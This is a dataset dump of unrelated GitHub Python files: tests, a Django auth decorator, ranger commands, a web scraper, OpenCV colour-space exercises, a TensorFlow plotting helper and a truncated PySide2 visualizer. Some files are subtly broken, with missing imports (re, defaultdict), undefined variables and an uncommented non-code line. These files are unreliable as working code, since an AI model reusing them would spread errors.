tests['Expected']\n\n\n\n\n","repo_name":"pvenkas/Python_REST_API_Test_Framework","sub_path":"test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12220790306","text":"import os\nfrom prime_numbers import prime_numbers\n\nif os.path.exists('D:/МОЕ/универ/программирование/практика 6/input4.txt'): # проверка существования файла\n file = open('input4.txt', 'r')\n Number = int(file.readline())\n prime_numbers(Number)\n\nelse: # если файл с исходными данными не существует, то пишем об этом\n file = open('output4.txt', 'w')\n file.write('Файл с входными данными не обнаружен')\n file.close()\n","repo_name":"froshiksid/practice","sub_path":"практика 6/lab6-5_3.py","file_name":"lab6-5_3.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15325553265","text":"\"\"\"\nIntegration tests for autopilotpattern/nats. These tests are executed\ninside a test-running container based on autopilotpattern/testing.\n\"\"\"\nimport os\nfrom os.path import expanduser\nimport random\nimport subprocess\nimport string\nimport sys\nimport time\nimport unittest\nimport uuid\n\nfrom testcases import AutopilotPatternTest, WaitTimeoutError, \\\n dump_environment_to_file\nimport consul as pyconsul\n\n\nclass NatsTest(AutopilotPatternTest):\n\n project_name = 'nats'\n\n def setUp(self):\n \"\"\"\n autopilotpattern/nats setup.sh writes an _env file with a CNS\n entry for Consul. If this has been mounted from the test environment,\n we'll use that, otherwise we have to generate it from the environment.\n Then make sure we use the external CNS name for the test rig.\n \"\"\"\n account = os.environ['TRITON_ACCOUNT']\n dc = os.environ['TRITON_DC']\n internal = 'consul-nats.svc.{}.{}.cns.joyent.com'.format(account, dc)\n external = 'consul-nats.svc.{}.{}.triton.zone'.format(account, dc)\n test_consul_host = os.environ.get('CONSUL', external)\n\n if not os.path.isfile('_env'):\n os.environ['CONSUL'] = internal\n dump_environment_to_file('_env')\n\n os.environ['CONSUL'] = test_consul_host\n\n\n def test_join_cluster(self):\n \"\"\"\n Check that 3 NATS servers can cluster together given a healthy one\n \"\"\"\n self.instrument(self.wait_for_containers,\n {'nats': 1, 'consul': 1}, timeout=300)\n self.compose_scale('nats', 2)\n self.instrument(self.wait_for_service, 'nats', count=2, timeout=120)\n\n _, nats1_ip = self.get_ips('nats_1')\n\n self.check_routes([nats1_ip], 'nats_2')\n\n\n def wait_for_containers(self, expected={}, timeout=30):\n \"\"\"\n Waits for all containers to be marked as 'Up' for all services.\n `expected` should be a dict of {\"service_name\": count}.\n TODO: lower this into the base class implementation.\n \"\"\"\n svc_regex = re.compile(r'^{}_(\\w+)_\\d+$'.format(self.project_name))\n\n def get_service_name(container_name):\n return svc_regex.match(container_name).group(1)\n\n while timeout > 0:\n containers = self.compose_ps()\n found = defaultdict(int)\n states = []\n for container in containers:\n service = get_service_name(container.name)\n found[service] = found[service] + 1\n states.append(container.state == 'Up')\n if all(states):\n if not expected or found == expected:\n break\n time.sleep(1)\n timeout -= 1\n else:\n raise WaitTimeoutError(\"Timed out waiting for containers to start.\")\n\n\n def check_routes(self, expected, container='nats_2', timeout=60):\n expected.sort()\n patt = '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:6222'\n while timeout > 0:\n conf = self.docker_exec(container,\n 'cat /etc/gnatsd.conf')\n actual = re.findall(patt, conf)\n actual = [IP(a.replace(':6222', '').strip())\n for a in actual]\n actual.sort()\n if actual == expected:\n break\n\n timeout -= 1\n time.sleep(1)\n else:\n self.fail(\"expected {} but got {} for NATS routes\"\n .format(expected, actual))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"autopilotpattern/nats","sub_path":"test/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"75"} +{"seq_id":"28958562034","text":"import traceback\nimport bleach\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_401_UNAUTHORIZED, \\\n HTTP_400_BAD_REQUEST, HTTP_500_INTERNAL_SERVER_ERROR\nfrom engagementmanager.service.authorization_service import \\\n AuthorizationService\nfrom engagementmanager.utils.request_data_mgr import request_data_mgr\nfrom engagementmanager.service.logging_service import LoggingServiceFactory\n\nlogger = LoggingServiceFactory.get_logger()\n\n\ndef auth(action, is_internal=False):\n \"\"\"\n Check that given action is permitted by the user\n \"\"\"\n def _dec(func):\n def _new_func(*args, **kwargs):\n auth_service = AuthorizationService()\n\n # Extract USER - A MUST Have in KWARGS #\n user = request_data_mgr.get_user()\n if user is None:\n msg = \"user couldn't be identified in the request\"\n logger.error(msg)\n if (is_internal):\n return msg, HTTP_400_BAD_REQUEST\n return Response(msg, status=status.HTTP_400_BAD_REQUEST)\n\n checklist_uuid = request_data_mgr.get_cl_uuid()\n eng_uuid = request_data_mgr.get_eng_uuid()\n\n try:\n result = None\n message = None\n result, message = auth_service.is_user_able_to(\n user, action, eng_uuid, checklist_uuid)\n logger.debug(\n 'Authorization Service : ' +\n action.name +\n '. Result=' +\n str(result) +\n '. message=' +\n str(message))\n if not result:\n msg = \"User not authorized: \" + \\\n str(user.uuid) + \". eng_uuid=\" + str(eng_uuid) + \\\n \". checklist_uuid=\" + str(checklist_uuid)\n if (is_internal):\n return msg, HTTP_401_UNAUTHORIZED\n msg = bleach.clean(msg, tags=['a', 'b'])\n return Response(msg, status=status.HTTP_401_UNAUTHORIZED)\n\n except Exception as e:\n logger.error(\n \"=====================Exception=====================\")\n msg = \"A problem occurred while trying \\\n to authorize user.uuid= \" + \\\n str(user.uuid) + \". eng_uuid=\" + str(eng_uuid) + \\\n \". checklist_uuid=\" + \\\n str(checklist_uuid) + \"action=\" + str(action)\n logger.error(str(e) + \" Message: \" + msg)\n logger.error(traceback.format_exc())\n logger.error(\n \"===================================================\")\n\n if (is_internal):\n return msg, HTTP_500_INTERNAL_SERVER_ERROR\n msg = \"Action was failed to be performed\"\n return Response(\n msg, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n return func(*args, **kwargs)\n\n return _new_func\n\n return _dec\n","repo_name":"onap/vvp-engagementmgr","sub_path":"django/engagementmanager/decorator/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"33032034565","text":"from functools import partial\nimport os\nimport os.path\nfrom pathlib import Path\nfrom typing import Generator, Iterable, Set, List\n\nfrom ranger.api.commands import Command\n\n\nclass z(Command):\n \"\"\"\n :z \n\n Jump to a directory using fasd. Supports tab completion.\n \"\"\"\n def execute(self) -> None:\n args = self.rest(1).split()\n if args:\n directories = self._get_directories(*args)\n if directories:\n self.fm.cd(directories[0])\n else:\n self.fm.notify(\"No results from fasd\", bad=True)\n\n def tab(self, tabnum: int) -> Generator[str, None, None]:\n start, current = self.start(1), self.rest(1)\n for path in self._get_directories(*current.split()):\n yield start + path\n\n @staticmethod\n def _get_directories(*args) -> List[str]:\n import subprocess\n output = subprocess.check_output([\"fasd\", \"-dl\", *args], universal_newlines=True)\n dirs = output.strip().split(\"\\n\")\n dirs.sort(reverse=True) # Listed in ascending frecency\n return dirs\n\n\n# TODO make standalone script\nclass dot(Command):\n \"\"\"\n :dot \n\n Move files to the dotfiles package .\n Files are either those tagged with `.` (entire tree),\n marked or currently selected.\n \"\"\"\n BASE_DIR = Path(\"~\").expanduser()\n DOTFILES_DIR = Path(\"~/dotfiles\").expanduser()\n TAG = '.'\n\n def execute(self) -> None:\n pkg_name = self.arg(1)\n if not pkg_name:\n self.fm.notify(\"Missing package name\", bad=True)\n return\n elif self.rest(2):\n self.fm.notify(\"Too many arguments\", bad=True)\n return\n\n paths = self._collect_paths()\n try:\n rel_paths = tuple(sorted(p.relative_to(self.BASE_DIR) for p in paths))\n except ValueError as e:\n self.fm.notify(str(e), bad=True)\n return\n\n self._check_confirm_paths(pkg_name, rel_paths)\n\n def _check_confirm_paths(self, pkg_name: str, rel_paths: Iterable[Path]) -> None:\n self.fm.ui.console.ask(\n f\"Add files to pkg {pkg_name!r}? [y/n] | {', '.join(map(str, rel_paths))}\",\n partial(self._on_confirm_paths, pkg_name, rel_paths),\n ('y', 'n')\n )\n\n def _on_confirm_paths(self, pkg_name: str, rel_paths: Iterable[Path], answer: str) -> None:\n if answer.lower() == 'n':\n return\n\n if pkg_name not in self._pkg_names():\n self.fm.ui.console.ask(\n f\"dotfile package {pkg_name!r} does not exist. Create? [y/n]\",\n partial(self._on_confirm_pkg_name, pkg_name, rel_paths),\n ('y', 'n')\n )\n else:\n self._import_dotfiles(pkg_name, rel_paths)\n\n def _on_confirm_pkg_name(self, pkg_name: str, rel_paths: Iterable[Path], answer: str) -> None:\n if answer.lower() == 'y':\n self._import_dotfiles(pkg_name, rel_paths)\n\n def _import_dotfiles(self, pkg_name: str, rel_paths: Iterable[Path]) -> None:\n import shutil\n\n pkg_dir = self.DOTFILES_DIR / pkg_name\n\n src_paths = [self.BASE_DIR / p for p in rel_paths]\n dst_paths = [pkg_dir / p for p in rel_paths]\n existing_paths = [p for p in dst_paths if p.exists()]\n if existing_paths:\n self.fm.notify(f\"Files already exist: {', '.join(map(str, existing_paths))}\", bad=True)\n # TODO could ask to overwrite\n return\n\n for src, dst in zip(src_paths, dst_paths):\n rel_dst = os.path.relpath(dst, start=src.parent)\n try:\n dst.parent.mkdir(parents=True, exist_ok=True)\n shutil.move(src, dst)\n except Exception as e:\n self.fm.notify(f\"Couldn't move {src!s} to {dst!s}\", bad=True, exception=e)\n continue\n else:\n try:\n src.symlink_to(rel_dst)\n except ValueError as e:\n self.fm.notify(f\"Couldn't symlink {src!s} to {dst!s}\", bad=True, exception=e)\n\n # Cannot use tags.remove(*src_path)\n # because they could have been expanded earlier.\n # Instead, we erase all '.' tags.\n for path, tag in self.fm.tags.tags.items():\n if tag == self.TAG:\n self.fm.tags.remove(path)\n\n self.fm.ui.status.need_redraw = True\n self.fm.ui.need_redraw = True\n\n def _collect_paths(self) -> Set[Path]:\n files: Set[str] = set()\n if self.fm.tags:\n files = {p for p, tag in self.fm.tags.tags.items() if tag == self.TAG}\n\n if not files:\n files = {obj.path for obj in self.fm.thistab.get_selection()}\n\n # expand directories\n expanded_paths: Set[Path] = set()\n for fpath in files:\n path = Path(fpath)\n if path.is_dir():\n expanded_paths |= {p for p in path.rglob(\"*\") if p.is_file()}\n else:\n expanded_paths.add(path)\n\n # filter symlinks\n filtered_paths = {p for p in expanded_paths if not p.is_symlink()}\n\n return filtered_paths\n\n def tab(self, tabnum: int) -> Generator[str, None, None]:\n start, current = self.start(1), self.rest(1)\n for name in sorted(self._pkg_names()):\n if name.startswith(current):\n yield start + name\n\n @classmethod\n def _pkg_names(cls) -> Generator[str, None, None]:\n yield from (p.name for p in cls.DOTFILES_DIR.iterdir() if p.is_dir())\n\n\nclass unlink(Command):\n \"\"\"\n :unlink []\n\n Replace a symlink with the thing it links to and optionally remove the original.\n \"\"\"\n\n def execute(self):\n import shutil\n remove = bool(self.arg(1))\n\n fileobjs = self.fm.thistab.get_selection()\n paths = {Path(obj.path) for obj in fileobjs}\n for src in paths:\n if not src.is_symlink():\n continue\n try:\n dst = src.resolve(strict=True)\n except FileNotFoundError:\n self.fm.notify(f\"Target of {src!s} does not exist\", bad=True)\n continue\n src.unlink()\n if remove:\n shutil.move(dst, src)\n else:\n shutil.copy2(dst, src)\n\n\nclass aur_mark_new(Command):\n \"\"\"\n :aur_mark_new\n\n Scan directory of seen aurutils repos and tag new packages.\n \"\"\"\n def execute(self):\n seen_dir = (os.environ.get('XDG_DATA_HOME', os.path.expanduser(\"~/.local/share\"))\n + \"/aurutils/view\")\n dir_ = self.fm.thisdir\n dir_.load_content(schedule=False) # force load content, so we can use .files\n dir_.mark_all(False)\n for f in dir_.files:\n if not os.path.exists(os.path.join(seen_dir, f.basename)):\n dir_.mark_item(f, True) # f.mark()\n # dir_.mark_item(f, not os.path.exists(os.path.join(seen_dir, f.basename)))\n\n dir_.load_content()\n\n\nclass mkcd(Command):\n \"\"\"\n :mkcd \n\n Create a directory with the name if it does not exist\n and switch to it.\n \"\"\"\n def execute(self):\n dirname = self.rest(1)\n if not dirname:\n self.fm.notify(\"No dirname given!\", bad=True)\n return\n target = os.path.join(self.fm.thisdir.path, os.path.expanduser(dirname))\n os.makedirs(target, exist_ok=True)\n self.fm.cd(target)\n\n def tab(self, tabnum):\n return self._tab_directory_content()\n","repo_name":"FichteFoll/dotfiles","sub_path":"ranger/.config/ranger/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":7553,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"75"} +{"seq_id":"2379121414","text":"import time\nfrom selenium import webdriver\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport os\n\ndef download_image(url, save_path):\n response = requests.get(url, stream=True)\n if response.status_code == 200:\n with open(save_path, 'wb') as f:\n for chunk in response.iter_content(chunk_size=8192):\n f.write(chunk)\n else:\n print(f\"Failed to download image from {url}\")\n\nif not os.path.exists(\"Images\"):\n os.mkdir(\"Images\")\n\ndriver = webdriver.Chrome()\ndriver.get(\"https://aitoptools.com/\")\n\nscroll_pause_time = 2\ntools_per_batch = 12 \nbatch_count = 0\n\ntry:\n with open(\"data.json\", 'r') as json_file:\n scraped_data = json.load(json_file)\n scraped_tools_urls = set(item['Name'] for item in scraped_data)\nexcept FileNotFoundError:\n scraped_data = []\n scraped_tool_urls = set() \n\nwhile True:\n batch_count += 1 \n page_source = driver.page_source\n soup = BeautifulSoup(page_source, \"html.parser\")\n tools_in_view = soup.find_all('div', class_=\"elementor elementor-43\")\n \n for tool in tools_in_view:\n tool_name = tool.find('h2', class_=\"elementor-heading-title elementor-size-default\").text.strip()\n if tool_name in scraped_tools_urls:\n continue\n scraped_tools_urls.add(tool_name) \n name = tool.find('h2', class_=\"elementor-heading-title elementor-size-default\").text.strip()\n try:\n price_div= tool.find('div', attrs={\"data-id\":\"600e028\"})\n price = price_div.find('div', class_=\"jet-listing-dynamic-field__content\").text.strip()\n except:\n price = None \n try:\n category_div= tool.find('div', attrs={\"data-id\":\"e33aa69\"})\n category = category_div.find('div', class_=\"jet-listing-dynamic-field__content\").text.strip()\n except:\n category = None \n download_div=tool.find(\"div\", attrs={\"data-id\":\"a27d6a1\"})\n download = download_div.find('div', class_=\"jet-listing-dynamic-field__content\").text.strip() \n toollink=[]\n toollink1=[]\n for link in tool.find_all('a', href=True): \n toollink.append(link['href']) \n toollink1.append(link['href'])\n print(\"Hurray onto the next...\", {len(toollink1)})\n for url in toollink1:\n r=requests.get(url)\n soup = BeautifulSoup(r.content, 'html.parser')\n\n website_div = soup.find('div', attrs={\"data-id\":\"7bcc280\"})\n try:\n website = website_div.find('a', href=True)['href']\n except:\n website = None\n reviews = soup.find('div', class_='elementor-star-rating__title').text.strip(\"()\")\n ratings = soup.find('div', class_='elementor-star-rating').span.text.strip()\n \n tags = [] \n tags_div = soup.find('div', attrs={\"data-id\":\"d100745\"})\n tags_links = tags_div.find_all('a', class_='jet-listing-dynamic-terms__link')\n tags = [link.text.strip() for link in tags_links]\n\n features = []\n features_div = soup.find('div', attrs={\"data-id\":\"5217d73\"})\n features_links = features_div.find_all('a', class_='jet-listing-dynamic-terms__link')\n features = [link.text.strip() for link in features_links]\n \n imgSrc = soup.find('div', class_='jet-listing jet-listing-dynamic-image').img['data-src'] \n desc = soup.find_all('p')[2].text.strip() \n \n data = {\n \"Name\": name,\n \"Price\": price,\n \"Category\": category,\n \"Downloads\": download,\n \"Website\": website,\n \"Review\": reviews,\n \"Rating\": ratings,\n \"Tags\": tags,\n \"Features\": features,\n \"ImgSrc\": imgSrc,\n \"Desc\":desc, \n }\n scraped_data.append(data)\n filename = os.path.basename(imgSrc)\n save_path = os.path.join(\"Images\", filename)\n download_image(imgSrc, save_path)\n with open(\"data.json\", 'w') as json_file:\n json.dump(scraped_data, json_file)\n \n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(scroll_pause_time)\n \n\n if len(scraped_tools_urls)==5108:\n break \n\ndriver.quit()","repo_name":"NjengaBen/webscrapingwithselenium","sub_path":"newscraper.py","file_name":"newscraper.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15521968986","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n url(r'^$',views.list,name='index'),\n\n url(r'^create/$',views.create,name='create'),\n url(r'^update/(?P\\d+)/$',views.update,name='update'),\n url(r'^delete/(?P\\d+)/$',views.delete,name='delete'),\n url(r'^reporte/$',views.ReportePersonalizadoExcel.as_view(),name='reporte'),\n]","repo_name":"Jose-Guachun/queryset","sub_path":"crud/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42286465624","text":"# coding:utf-8\n# opencv_04色彩空间\n# author:Qinyuan\n\nfrom cv2 import cv2\nimport numpy as np\n\n##########\n### 例1 ##\nBGR = cv2.imread(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\baby_200.jpg\")\ncv2.imshow(\"BGR\",BGR)\n#转化为RGB\nRGB = cv2.cvtColor(BGR,cv2.COLOR_BGR2RGB)\ncv2.imshow(\"RGB\",RGB)\n#转化为HSV\nHSV = cv2.cvtColor(BGR,cv2.COLOR_BGR2HSV)\ncv2.imshow(\"HSV\",HSV)\n#转化为GRAY\nGRAY = cv2.cvtColor(BGR,cv2.COLOR_BGR2GRAY)\ncv2.imshow(\"GRAY\",GRAY)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n##########\n### 例2 ##\n创建三通道的图像像素值\nGreen_BGR = np.zeros([1,1,3],dtype=np.uint8)\n#将G(绿色)通道显示纯绿色,设置为255\nGreen_BGR[0,0,1]=255\n#转为HSV色彩空间 \nGreen_HSV = cv2.cvtColor(Green_BGR,cv2.COLOR_BGR2HSV)\n#输出对应的值\nprint(\"BGR=\",Green_BGR)\nprint(\"HSV\",Green_HSV)\n\n##########\n### 例3 ##\nimg = np.random.randint(0,256,size=[3,3],dtype=np.uint8)\nmin = 100\nmax = 200\ndst = cv2.inRange(img,min,max)\nprint(\"img=\\n\",img)\nprint(\"dst=\\n\",dst)\n\n##########\n### 例4 ##\nimg = np.random.randint(0,256,size=[5,5],dtype=np.uint8)\n#设置像素下限\nmin = 100\n#设置像素上限\nmax = 200\n#范围单元处理\nmask = cv2.inRange(img,min,max)\n#按位与操作得到处于该范围内的像素值\nROI = cv2.bitwise_and(img,img,mask=mask)\nprint(\"img=\\n\",img)\nprint(\"mask=\\n\",mask)\nprint(\"ROI=\\n\",ROI)\n\n##########\n### 例5 ##\nBGR = cv2.imread(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\baby_200.jpg\")\ncv2.imshow(\"BGR\",BGR)\n#转化为HSV\nHSV = cv2.cvtColor(BGR,cv2.COLOR_BGR2HSV)\ncv2.imshow(\"HSV\",HSV)\n############ 指定蓝色值的范围 ##############\nmin_blue = np.array([0,50,50])\nmax_blue = np.array([10,255,255])\n# 确定蓝色区域\nmask = cv2.inRange(HSV,min_blue,max_blue)\ncv2.imshow(\"mask\",mask)\n# 通过按或与操作提取红色区域\nresult = cv2.bitwise_and(BGR,BGR,mask=mask)\ncv2.imshow(\"result\",result)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n##########\n### 例6 ##\nimg = cv2.imread(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\face.jpg\")\ncv2.imshow(\"img\",img)\nHSV = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n#将HSV色彩空间通道拆分\nh,s,v = cv2.split(HSV)\n#设置色调上、下限\nmin_H = 5\nmax_H = 170\n#处理色调范围\nmask_h = cv2.inRange(h,min_H,max_H)\n#设置饱和度上、下限\nmin_s = 25\nmax_s = 166\n#处理饱和度范围\nmask_s = cv2.inRange(s,min_s,max_s)\n#得到脸部肤色的mask\nmask = mask_h & mask_s\n#获得最后结果图 ROI\nROI = cv2.bitwise_and(img,img,mask = mask)\ncv2.imshow(\"ROI\",ROI)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n##########\n### 例7 ##\nimg = cv2.imread(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\face.jpg\")\ncv2.imshow(\"img\",img)\nHSV = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n#将HSV色彩空间通道拆分\nh,s,v = cv2.split(HSV)\n#将亮度V全赋值为255\nv[:,:]=255\n#通道合成\nhsv = cv2.merge([h,s,v])\nart = cv2.cvtColor(hsv,cv2.COLOR_HSV2BGR)\ncv2.imshow(\"art\",art)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n##########\n### 例8 ##\nimg = cv2.imread(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\baby_200.jpg\")\ncv2.imshow(\"BGR\",img)\n#转为BGRA四通道\nalpha = cv2.cvtColor(img,cv2.COLOR_BGR2BGRA)\n#对图像进行通道拆分\nb,g,r,a = cv2.split(alpha)\n#赋值a为255,与原图一致\na[:,:]=255\n#通道合成\nalp_255 = cv2.merge([b,g,r,a])\ncv2.imshow(\"255\",alp_255)\n#赋值a为125\na[:,:] = 125\nalp_125 = cv2.merge([b,g,r,a])\ncv2.imshow(\"125\",alp_125)\n#赋值a为0\na[:,:] = 0\nalp_0 = cv2.merge([b,g,r,a])\ncv2.imshow(\"0\",alp_0)\n#保存图像至本地\ncv2.imwrite(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\alpha\\alp_255.png\",alp_255)\ncv2.imwrite(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\alpha\\alp_0.png\",alp_0)\ncv2.imwrite(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\alpha\\alp_125.png\",alp_125)\ncv2.waitKey()\ncv2.destroyAllWindows()\n","repo_name":"Qin-Yuan/python-opencv","sub_path":"opencv_base/opencv_04.py","file_name":"opencv_04.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"43514883787","text":"\"\"\" Plot function for the WindowGenerator class \"\"\"\n\nimport matplotlib.pyplot as plt\n\n\n\n\ndef _plot_example(self, model=None, plot_col=None, max_subplots=1, xlabel='Time [h]'):\n inputs, labels = self.example\n # print(f'Cached example.inputs: {next(iter(self._example))}')\n \n plot_col_index = self.column_indices[plot_col]\n max_n = min(max_subplots, len(inputs))\n \n fig, _ = plt.subplots(max_n, 1, \n figsize=(12, int(2*max_subplots)),\n sharex=True,\n gridspec_kw=dict(hspace=0.05),\n )\n for n in range(max_n):\n plt.subplot(max_n, 1, n+1)\n plt.ylabel(f'{plot_col} [normed]')\n plt.plot(self.input_indices, inputs[n, :, plot_col_index],\n label='Inputs', marker='.', zorder=-10)\n\n if self.label_columns:\n label_col_index = self.label_columns_indices.get(plot_col, None)\n else:\n label_col_index = plot_col_index\n\n if label_col_index is None:\n continue\n\n plt.scatter(self.label_indices, labels[n, :, label_col_index],\n edgecolors='k', label='Labels', c='#2ca02c', s=64)\n if model is not None:\n predictions = model(inputs)\n plt.scatter(self.label_indices, predictions[n, :, label_col_index],\n marker='X', edgecolors='k', label='Predictions',\n c='#ff7f0e', s=64)\n\n if n == 0:\n plt.legend()\n\n plt.xlabel(xlabel)\n\n return fig\n\n\n\nif __name__ == \"__main__\":\n\n import pandas as pd\n import numpy as np\n # import matplotlib\n # matplotlib.use('module://matplotlib-sixel')\n np.random.seed(1)\n\n from window_generator import WindowGenerator\n\n # A random df\n n = 20\n rng = np.random.default_rng(seed=0)\n df = pd.DataFrame(np.around(rng.random((n, 4)), 1), columns=['a','b','c','y'])\n df = pd.DataFrame(v.T, columns=['a','b','c','y'], index=idx)\n df.iloc[1:2,:] = np.nan\n df.iloc[7:9,:] = np.nan\n\n\n my_window = WindowGenerator(input_width=3, label_width=1, shift=1,\n train_df=df, val_df=df, test_df=df,\n batch_size=2, label_columns=['b'],\n use_label_columns=True\n )\n\n\n fig = _plot_example(my_window, plot_col='b')\n print(f'Object returned: {fig}')\n\n\n","repo_name":"eliasmaxil/TF_TimeSeries_tut","sub_path":"model_utils/_plot_example.py","file_name":"_plot_example.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25420249087","text":"import sys\n\nfrom dataclasses import dataclass\nimport math\nfrom collections import defaultdict\nfrom itertools import groupby\nfrom operator import attrgetter\n\nfrom PySide2.QtWidgets import QApplication, QOpenGLWidget, QVBoxLayout, QLabel, QSizePolicy\nfrom PySide2.QtGui import QPainter, QPen, QBrush, QColor, QPainterPath, QTransform, QStaticText\nfrom PySide2.QtCore import QObject, QRect, QRectF, Qt, QPoint, QPointF, Slot, Signal\n\nfrom lemin_vis.animation_control import SimulationState, AnimationControl\n\nMIN_ZOOM = 0.01\nMAX_ZOOM = 200\n\n\n@dataclass\nclass Camera:\n viewport: QOpenGLWidget\n pos: QPointF\n zoom: float\n\n def fit_solution_in_view(self, solution):\n if not solution.rect:\n return\n\n solution_rect = QRect(QPoint(solution.rect.left, solution.rect.top),\n QPoint(solution.rect.right, solution.rect.bottom))\n\n viewport_rect = self.viewport.rect()\n\n # compute zoom level\n if solution_rect.width() > solution_rect.height():\n zoom = viewport_rect.width() / solution_rect.width() if viewport_rect.width() else 1\n else:\n zoom = viewport_rect.height() / solution_rect.height() if viewport_rect.height() else 1\n\n self.zoom = 0.80 * zoom if zoom else 1\n self.zoom = clamp(self.zoom, MIN_ZOOM, MAX_ZOOM) # limit zoom level\n\n # center view on rect center\n self.pos = -QPointF(solution_rect.center())\n\n\ndef clamp(v, smallest, largest):\n \"limit value on both sides\"\n return max(smallest, min(v, largest))\n\n\nclass View(QOpenGLWidget): # inherit from QOpenGLWidget to enable opengl backend for QPainter\n room_size = 28\n ant_size = 16\n\n def __init__(self, map, solution, parent=None):\n super().__init__(parent)\n self.setWindowTitle(\"lemin42 visual\")\n\n self.camera = Camera(self, QPointF(0, 0), 1)\n self.mouse_last_pos = QPoint(0, 0)\n self.map = map\n self.solution = solution\n self.steps = 0\n\n self.create_pens()\n self.create_link_layer()\n self.create_solution_paths()\n\n self.anim_control = AnimationControl(solution)\n\n self.create_ui()\n\n self.camera.fit_solution_in_view(solution)\n\n # start redraw timer\n self.startTimer(1000 / 60) # 60 fps\n\n def create_link_layer(self):\n \"\"\"\n optimization: store all links in QPainterPath object\n to draw it in one call\n \"\"\"\n\n self.link_layer = link_layer = QPainterPath()\n\n for link in self.map.links:\n from_ = link.from_.coords\n to_ = link.to_.coords\n\n link_layer.moveTo(from_.x, from_.y)\n link_layer.lineTo(to_.x, to_.y)\n\n def create_solution_paths(self):\n self.solution_paths = []\n\n # group ants by paths\n self.path_ants = defaultdict(list)\n for ant in self.solution.ants.values():\n self.path_ants[ant.path].append(ant)\n\n # add ant paths to view\n for path in self.path_ants:\n qpath = QPainterPath()\n for link in path.links:\n from_ = link.from_.coords\n to_ = link.to_.coords\n\n qpath.moveTo(from_.x, from_.y)\n qpath.lineTo(to_.x, to_.y)\n\n self.solution_paths.append(qpath)\n\n def create_pens(self):\n pen = QPen(QColor(\"#33434B\"), 3)\n pen.setCosmetic(True) # makes pen size zoom independent\n self.link_pen = pen\n\n pen = QPen(QColor(\"#5A667A\"), self.room_size)\n pen.setCosmetic(True) # makes pen size zoom independent\n self.room_pen = pen\n\n pen = QPen(QColor(\"#FF0266\"), self.ant_size)\n pen.setCosmetic(True) # makes pen size zoom independent\n self.ant_pen = pen\n\n pen = QPen(QColor(\"#AAAAAA\"), 1)\n self.text_pen = pen\n\n pen = QPen(QColor(\"#20FF20\"), 1)\n self.special_text_pen = pen\n\n # create path pens\n ant_colors = [\"#FF008D\", \"#FF00FF\", \"#FFE100\", \"#FF0000\"]\n\n self.solution_path_pens = [QPen(QColor(color).darker(100), 3)\n for color in ant_colors]\n\n for pen in self.solution_path_pens:\n pen.setCosmetic(True)\n\n self.ant_pens = [QPen(QColor(color), self.ant_size)\n for color in ant_colors]\n\n for pen in self.ant_pens:\n pen.setCosmetic(True)\n\n def create_ui(self):\n alignTop = Qt.AlignTop | Qt.AlignLeft\n alignBottom = Qt.AlignBottom | Qt.AlignLeft\n\n layout = QVBoxLayout()\n self.setLayout(layout)\n\n # add error label if any errors from parsing\n if self.map.error or self.solution.error:\n error_lbl = QLabel(self.map.error or self.solution.error)\n error_lbl.setObjectName(\"error\")\n layout.addWidget(error_lbl, 0, alignTop)\n\n self.setStyleSheet(\"\"\"\n QLabel {color: #eeeeee; font: 20px;}\n QLabel#error {color: #e91e63; font: 18px;}\n QLabel#second {color: #aaaaaa; font: 15px;}\n \"\"\")\n\n map_params_label = QLabel(\n f\"{self.map.number_of_ants} ants\"\n f\" {len(self.map.rooms)} rooms\"\n f\" {len(self.map.links)} links \")\n\n map_params_label.setObjectName('second')\n layout.addWidget(map_params_label, 0, alignTop)\n\n state_label = QLabel(\"playing\")\n layout.addWidget(state_label, 0, alignTop)\n\n def on_state_changed(value):\n mapping = {\n SimulationState.playing: 'playing',\n SimulationState.paused: 'paused'\n }\n\n state_label.setText(mapping[value])\n\n self.anim_control.stateChanged.connect(on_state_changed)\n\n step_label = QLabel(\"\")\n layout.addWidget(step_label, 0, alignTop)\n\n def on_step_changed(value):\n step_label.setText(\n 